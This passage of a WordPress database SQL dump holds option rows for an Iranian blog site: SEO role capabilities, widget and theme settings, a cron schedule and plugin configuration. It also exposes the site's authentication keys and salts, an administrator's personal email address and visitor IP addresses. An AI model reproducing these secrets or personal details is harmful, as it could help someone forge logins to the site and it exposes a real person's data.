manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:55:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:14:\"edit_portfolio\";b:1;s:14:\"read_portfolio\";b:1;s:16:\"delete_portfolio\";b:1;s:15:\"edit_portfolios\";b:1;s:22:\"edit_others_portfolios\";b:1;s:18:\"publish_portfolios\";b:1;s:23:\"read_private_portfolios\";b:1;s:17:\"delete_portfolios\";b:1;s:25:\"delete_private_portfolios\";b:1;s:27:\"delete_published_portfolios\";b:1;s:24:\"delete_others_portfolios\";b:1;s:23:\"edit_private_portfolios\";b:1;s:25:\"edit_published_portfolios\";b:1;s:22:\"manage_portfolio_terms\";b:1;s:20:\"edit_portfolio_terms\";b:1;s:22:\"delete_portfolio_terms\";b:1;s:22:\"assign_portfolio_terms\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:53:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:14:\"edit_portfolio\";b:1;s:14:\"read_portfolio\";b:1;s:16:\"delete_portfolio\";b:1;s:15:\"edit_portfolios\";b:1;s:22:\"edit_others_portfolios\";b:1;s:18:\"publish_portfolios\";b:1;s:23:\"read_private_portfolios\";b:1;s:17:\"delete_portfolios\";b:1;s:25:\"delete_private_portfolios\";b:1;s:27:\"delete_published_portfolios\";b:1;s:24:\"delete_others_portfolios\";b:1;s:23:\"edit_private_portfolios\";b:1;s:25:\"edit_published_portfolios\";b:1;s:22:\"manage_portfolio_terms\";b:1;s:20:\"edit_portfolio_terms\";b:1;s:22:\"delete_portfolio_terms\";b:1;s:22:\"assign_portfolio_terms\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),
(96,'fresh_site','0','off'),
(97,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),
(98,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(99,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),
(100,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(101,'widget_meta','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:1:{s:5:\"title\";s:0:\"\";}}','yes'),
(102,'sidebars_widgets','a:2:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";i:4;s:6:\"meta-3\";}s:13:\"array_version\";i:3;}','yes'),
(103,'cron','a:27:{i:1778963549;a:1:{s:26:\"action_scheduler_run_queue\";a:1:{s:32:\"0d04ed39571b55704c122d726248bbac\";a:3:{s:8:\"schedule\";s:12:\"every_minute\";s:4:\"args\";a:1:{i:0;s:7:\"WP Cron\";}s:8:\"interval\";i:60;}}}i:1778963851;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1778964550;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1778965873;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1778976000;a:1:{s:35:\"rank_math/redirection/clean_trashed\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1778980428;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1778982272;a:1:{s:35:\"rank_math/content-ai/update_prompts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1778990640;a:1:{s:25:\"ZhUpClient_update_checker\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1778993902;a:1:{s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1778993936;a:1:{s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779002620;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779003425;a:3:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1779003436;a:1:{s:26:\"wordfence_daily_autoUpdate\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779003451;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779019188;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779020371;a:1:{s:34:\"mega_theme_license_daily_validator\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779033836;a:1:{s:28:\"zhaket_guard_daily_validator\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779040372;a:1:{s:23:\"aiowps_clean_old_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779046369;a:1:{s:28:\"wp_statistics_add_visit_hook\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779046625;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779046656;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779046657;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779062400;a:1:{s:30:\"rank_math/links/internal_links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1779299325;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1779312116;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1779364788;a:1:{s:16:\"wpseo_ryte_fetch\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','on'),
(104,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(105,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(106,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(107,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(108,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(109,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(110,'nonce_key','@Z6z-0_66q@%m:+[m(Rc;d33$1pqA!dfbn,XGq%%Yy?`w@lDE|iy`CmOW& 8#{5=','no'),
(111,'nonce_salt','Fgd Cr/k7j`ZR%VG~Y<KhDHH>(og=YH1VLs?404q~ZGQ&Kk]%j,D{NcT.Q77PpJW','no'),
(112,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(113,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(114,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(116,'recovery_keys','a:0:{}','off'),
(120,'theme_mods_twentytwenty','a:8:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1621542491;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}s:9:\"sidebar-1\";a:4:{i:0;s:14:\"recent-posts-2\";i:1;s:12:\"categories-2\";i:2;s:10:\"archives-2\";i:3;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}}}s:18:\"nav_menu_locations\";a:0:{}s:16:\"background_color\";s:6:\"020202\";s:24:\"accent_accessible_colors\";a:2:{s:7:\"content\";a:5:{s:4:\"text\";s:7:\"#ffffff\";s:6:\"accent\";s:7:\"#e41a50\";s:10:\"background\";s:7:\"#020202\";s:7:\"borders\";s:7:\"#262626\";s:9:\"secondary\";s:7:\"#7f7f7f\";}s:13:\"header-footer\";a:4:{s:4:\"text\";s:7:\"#000000\";s:6:\"accent\";s:7:\"#cd2653\";s:9:\"secondary\";s:7:\"#6d6d6d\";s:7:\"borders\";s:7:\"#dcd7ca\";}}s:12:\"blog_content\";s:7:\"summary\";s:11:\"retina_logo\";b:0;s:11:\"custom_logo\";i:93;}','no'),
(124,'auth_key','o`qaDB[^U@VDx4ER45Q3 Ipu1]!`,#uD)5qQ` 71#9v5c*u_n/*o,65rz@H[deD','no'),
(125,'auth_salt','<b=NL-krSPwEnqg^GIaP0l-$(*dNvt#x!bf p)ng},!5<j`czE2_ON/^P|$$g5B|','no'),
(126,'logged_in_key','MSB<TYrulpH+lTjf`4,:MDSb.CcCG4lnX^z%jm)K6>/naN!MfKhZWuGG&I:oI]F ','no'),
(127,'logged_in_salt','zUf#J31TiHE&,m{$M7Cu]X{w;D]R|K~!^a+QAT?]A/gpC7[7p( w:esW^7+$4IzU','no'),
(154,'current_theme','Hello Elementor','yes'),
(155,'theme_switched','','yes'),
(187,'WPLANG','','yes'),
(188,'new_admin_email','masoud.nikoofar@gmail.com','yes'),
(193,'recently_activated','a:0:{}','off'),
(198,'su_option_custom-formatting','on','no'),
(199,'su_option_skip','on','no'),
(200,'su_option_prefix','su_','no'),
(201,'su_option_custom-css','','no'),
(202,'su_option_supported_blocks','a:3:{i:0;s:14:\"core/paragraph\";i:1;s:14:\"core/shortcode\";i:2;s:13:\"core/freeform\";}','no'),
(203,'su_option_generator_access','manage_options','no'),
(204,'su_option_enable_shortcodes_in','a:1:{i:0;s:16:\"term_description\";}','no'),
(205,'su_option_hide_deprecated','on','no'),
(206,'widget_shortcodes-ultimate','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(207,'su_option_version','5.7.0','no'),
(208,'su_option_dismissed_notices','a:1:{s:4:\"rate\";i:1581235105;}','yes'),
(223,'theme_mods_coral-dark','a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1621545416;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}s:9:\"sidebar-1\";a:0:{}s:16:\"footer-copyright\";a:0:{}}}s:11:\"custom_logo\";i:308;}','no'),
(232,'theme_mods_dark','a:6:{i:0;b:0;s:18:\"nav_menu_locations\";a:0:{}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1585826904;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:4:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:6:\"text-2\";i:3;s:6:\"text-3\";}s:9:\"sidebar-1\";a:4:{i:0;s:14:\"recent-posts-2\";i:1;s:12:\"categories-2\";i:2;s:10:\"archives-2\";i:3;s:6:\"meta-2\";}}}s:12:\"header_image\";s:73:\"http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank-1-2.png\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:310;s:3:\"url\";s:73:\"http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank-1-2.png\";s:13:\"thumbnail_url\";s:73:\"http://ictbank.ir/blog/wp-content/uploads/2020/02/cropped-ictbank-1-2.png\";s:6:\"height\";i:412;s:5:\"width\";i:1000;}}','no'),
(254,'EasyCodeAdminOption','a:24:{s:8:\"hidecode\";i:0;s:21:\"collapsed-line-number\";i:8;s:6:\"rownum\";i:2;s:10:\"html_tag_p\";i:0;s:15:\"handle_comments\";i:1;s:9:\"edit_code\";i:2;s:6:\"nowrap\";i:1;s:8:\"tab-size\";i:4;s:4:\"size\";a:2:{s:5:\"width\";i:0;s:6:\"height\";i:0;}s:16:\"use_custom_color\";i:0;s:12:\"system_color\";s:4:\"Gray\";s:12:\"color_scheme\";s:4:\"Gray\";s:11:\"color_cache\";a:8:{s:10:\"background\";s:6:\"f7f7f7\";s:12:\"background_a\";s:3:\"fff\";s:4:\"text\";s:3:\"666\";s:6:\"text_a\";s:6:\"336699\";s:18:\"linenum_background\";s:3:\"999\";s:7:\"linenum\";s:3:\"999\";s:6:\"border\";s:3:\"666\";s:9:\"extra_css\";s:0:\"\";}s:12:\"color_custom\";a:7:{s:10:\"background\";s:6:\"f7f7f7\";s:12:\"background_a\";s:3:\"fff\";s:4:\"text\";s:3:\"666\";s:6:\"text_a\";s:6:\"336699\";s:18:\"linenum_background\";s:3:\"999\";s:6:\"border\";s:3:\"666\";s:9:\"extra_css\";s:0:\"\";}s:5:\"color\";a:6:{s:2:\"bg\";s:6:\"f7f7f7\";s:3:\"bga\";s:3:\"fff\";s:4:\"text\";s:3:\"666\";s:5:\"texta\";s:6:\"336699\";s:4:\"side\";s:3:\"ccc\";s:6:\"border\";s:3:\"666\";}s:12:\"border-width\";i:1;s:9:\"formatted\";a:3:{s:2:\"bb\";i:0;s:3:\"pre\";i:1;s:4:\"code\";i:0;}s:11:\"highlighter\";i:1;s:7:\"hlcolor\";a:10:{s:8:\"function\";s:3:\"00f\";s:7:\"keyword\";s:3:\"f00\";s:7:\"comment\";s:3:\"888\";s:9:\"important\";s:3:\"f0f\";s:6:\"string\";s:3:\"080\";s:8:\"constant\";s:3:\"880\";s:6:\"number\";s:3:\"808\";s:8:\"variable\";s:3:\"088\";s:6:\"symbol\";s:3:\"800\";s:4:\"char\";s:3:\"80f\";}s:11:\"lang_enable\";a:4:{i:0;s:3:\"php\";i:1;s:4:\"html\";i:2;s:10:\"javascript\";i:3;s:3:\"css\";}s:23:\"mce-button-row-position\";i:1;s:10:\"font_style\";s:8:\"consolas\";s:9:\"font-size\";s:2:\"90\";s:19:\"allow-download-font\";b:1;}','yes'),
(277,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":8,\"critical\":1}','yes'),
(300,'wp_statistics_plugin_version','14.1.3.1','yes'),
(301,'wp_statistics_db_version','12.6.13','yes'),
(302,'wp_statistics','a:30:{s:18:\"pending_db_updates\";a:2:{s:13:\"date_ip_agent\";b:0;s:11:\"unique_date\";b:0;}s:16:\"search_converted\";i:1;s:9:\"robotlist\";s:1715:\"007ac9\n5bot\nA6-Indexer\nAbachoBOT\naccoona\nAcoiRobot\nAddThis.com\nADmantX\nAdsBot-Google\nadvbot\nAhrefsBot\naiHitBot\nalexa\nalphabot\nAltaVista\nAntivirusPro\nanyevent\nappie\nApplebot\narchive.org_bot\nAsk Jeeves\nASPSeek\nBaiduspider\nBenjojo\nBeetleBot\nbingbot\nBlekkobot\nblexbot\nBOT for JCE\nbubing\nButterfly\ncbot\nclamantivirus\ncliqzbot\nclumboot\ncoccoc\ncrawler\nCrocCrawler\ncrowsnest.tv\ndbot\ndl2bot\ndotbot\ndownloadbot\nduckduckgo\nDumbot\nEasouSpider\neStyle\nEveryoneSocialBot\nExabot\nezooms\nfacebook.com\nfacebookexternalhit\nFAST\nFeedfetcher-Google\nfeedzirra\nfindxbot\nFirfly\nFriendFeedBot\nfroogle\nGeonaBot\nGigabot\ngirafabot\ngimme60bot\nglbot\nGooglebot\nGroupHigh\nia_archiver\nIDBot\nInfoSeek\ninktomi\nIstellaBot\njetmon\nKraken\nLeikibot\nlinkapediabot\nlinkdexbot\nLinkpadBot\nLoadTimeBot\nlooksmart\nltx71\nLycos\nMail.RU_Bot\nMe.dium\nmeanpathbot\nmediabot\nmedialbot\nMediapartners-Google\nMJ12bot\nmsnbot\nMojeekBot\nmonobot\nmoreover\nMRBOT\nNationalDirectory\nNerdyBot\nNetcraftSurveyAgent\nniki-bot\nnutch\nOpenbot\nOrangeBot\nowler\np4Bot\nPaperLiBot\npageanalyzer\nPagesInventory\nPimonster\nporkbun\npr-cy\nproximic\npwbot\nr4bot\nrabaz\nRambler\nRankivabot\nrevip\nriddler\nrogerbot\nScooter\nScrubby\nscrapy.org\nSearchmetricsBot\nsees.co\nSemanticBot\nSemrushBot\nSeznamBot\nsfFeedReader\nshareaholic-bot\nsistrix\nSiteExplorer\nSlurp\nSocialradarbot\nSocialSearch\nSogou web spider\nSpade\nspbot\nSpiderLing\nSputnikBot\nSuperfeedr\nSurveyBot\nTechnoratiSnoop\nTECNOSEEK\nTeoma\ntrendictionbot\nTweetmemeBot\nTwiceler\nTwitterbot\nTwitturls\nu2bot\nuMBot-LN\nuni5download\nunrulymedia\nUptimeRobot\nURL_Spider_SQL\nVagabondo\nvBSEO\nWASALive-Bot\nWebAlta Crawler\nWebBug\nWebFindBot\nWebMasterAid\nWeSEE\nWotbox\nwsowner\nwsr-agent\nwww.galaxy.com\nx100bot\nXoviBot\nxzybot\nyandex\nYahoo\nYammybot\nYoudaoBot\nZyBorg\nZemlyaCrawl\";s:13:\"anonymize_ips\";b:0;s:5:\"geoip\";b:0;s:10:\"useronline\";b:1;s:6:\"visits\";b:1;s:8:\"visitors\";b:1;s:5:\"pages\";b:1;s:12:\"check_online\";s:3:\"120\";s:8:\"menu_bar\";b:0;s:11:\"coefficient\";s:1:\"1\";s:12:\"stats_report\";b:0;s:11:\"time_report\";s:5:\"daily\";s:11:\"send_report\";s:4:\"mail\";s:14:\"content_report\";s:0:\"\";s:12:\"update_geoip\";b:1;s:8:\"store_ua\";b:0;s:21:\"exclude_administrator\";s:1:\"1\";s:18:\"disable_se_clearch\";b:1;s:16:\"disable_se_qwant\";b:1;s:16:\"disable_se_baidu\";b:1;s:14:\"disable_se_ask\";b:1;s:8:\"map_type\";s:6:\"jqvmap\";s:9:\"ip_method\";s:11:\"REMOTE_ADDR\";s:18:\"force_robot_update\";b:1;s:17:\"show_welcome_page\";b:1;s:23:\"first_show_welcome_page\";b:1;s:20:\"disable_donation_nag\";b:1;s:13:\"admin_notices\";b:0;}','yes'),
(303,'widget_wp_statistics_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(304,'wp_statistics_check_useronline','1608980921','yes'),
(305,'wp_statistics_overview_page_ads','a:3:{s:9:\"timestamp\";i:1670064794;s:3:\"ads\";a:2:{s:6:\"status\";s:2:\"no\";s:2:\"ID\";s:4:\"none\";}s:4:\"view\";s:0:\"\";}','no'),
(308,'wp_statistics_referrals_detail','a:15:{s:10:\"ictbank.ir\";a:3:{s:2:\"ip\";s:11:\"82.102.9.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:12:\"- Index page\";}s:11:\"82.102.9.14\";a:3:{s:2:\"ip\";s:11:\"82.102.9.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:10:\"ictbank.ir\";}s:15:\"l.instagram.com\";a:3:{s:2:\"ip\";s:14:\"157.240.221.63\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:9:\"Instagram\";}s:19:\"www.design-arena.ir\";a:3:{s:2:\"ip\";s:11:\"82.102.9.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:10:\"ictbank.ir\";}s:14:\"www.ictbank.ir\";a:3:{s:2:\"ip\";s:11:\"82.102.9.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:10:\"ictbank.ir\";}s:15:\"design-arena.ir\";a:3:{s:2:\"ip\";s:11:\"82.102.9.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:10:\"ictbank.ir\";}s:16:\"www.linkedin.com\";a:3:{s:2:\"ip\";s:12:\"185.63.144.1\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:27:\"LinkedIn: Log In or Sign Up\";}s:20:\"mail.design-arena.ir\";a:3:{s:2:\"ip\";s:11:\"82.102.9.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:10:\"ictbank.ir\";}s:10:\"google.com\";a:3:{s:2:\"ip\";s:12:\"172.217.0.14\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:6:\"Google\";}s:9:\"baidu.com\";a:3:{s:2:\"ip\";s:14:\"220.181.38.148\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:0:\"\";}s:11:\"example.com\";a:3:{s:2:\"ip\";s:13:\"93.184.216.34\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:14:\"Example Domain\";}s:14:\"www.google.com\";a:3:{s:2:\"ip\";s:13:\"64.233.184.99\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:6:\"Google\";}s:12:\"www.bing.com\";a:3:{s:2:\"ip\";s:13:\"13.107.21.200\";s:7:\"country\";s:0:\"\";s:5:\"title\";s:4:\"Bing\";}s:12:\"45.92.94.221\";a:3:{s:2:\"ip\";s:12:\"45.92.94.221\";s:7:\"country\";s:3:\"000\";s:5:\"title\";s:10:\"ictbank.ir\";}s:15:\"wikisonnati.com\";a:3:{s:2:\"ip\";s:12:\"45.92.94.221\";s:7:\"country\";s:3:\"000\";s:5:\"title\";s:10:\"ictbank.ir\";}}','no'),
(310,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(1696,'widget_powerpress_subscribe','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(1699,'powerpress_general','a:4:{s:24:\"pp_onboarding_incomplete\";i:0;i:0;s:18:\"powerpress_general\";s:9:\"timestamp\";i:1582748671;s:14:\"current_season\";s:0:\"\";}','yes'),
(1700,'powerpress_feed_podcast','a:4:{s:5:\"title\";s:6:\"دشت\";s:11:\"apple_cat_1\";s:5:\"11-02\";s:15:\"itunes_explicit\";s:1:\"2\";s:12:\"itunes_image\";s:71:\"http://ictbank.ir/blog/wp-content/plugins/powerpress/itunes_default.jpg\";}','yes'),
(1758,'akismet_spam_count','3','yes'),
(4427,'wordfence_installed','1','yes'),
(4429,'wf_plugin_act_error','','yes'),
(4536,'wordfence_syncAttackDataAttempts','0','off'),
(4537,'wordfence_syncingAttackData','0','off'),
(4539,'wordfence_lastSyncAttackData','1723003560','off'),
(5875,'db_upgraded','','on'),
(6276,'_transient_coral_dark_categories','2','yes'),
(6292,'_transient_dark_categories','2','yes'),
(6301,'mcredirect','no','no'),
(6302,'bvActivateTime','1585769226','no'),
(6303,'bvoverridecw','1','no'),
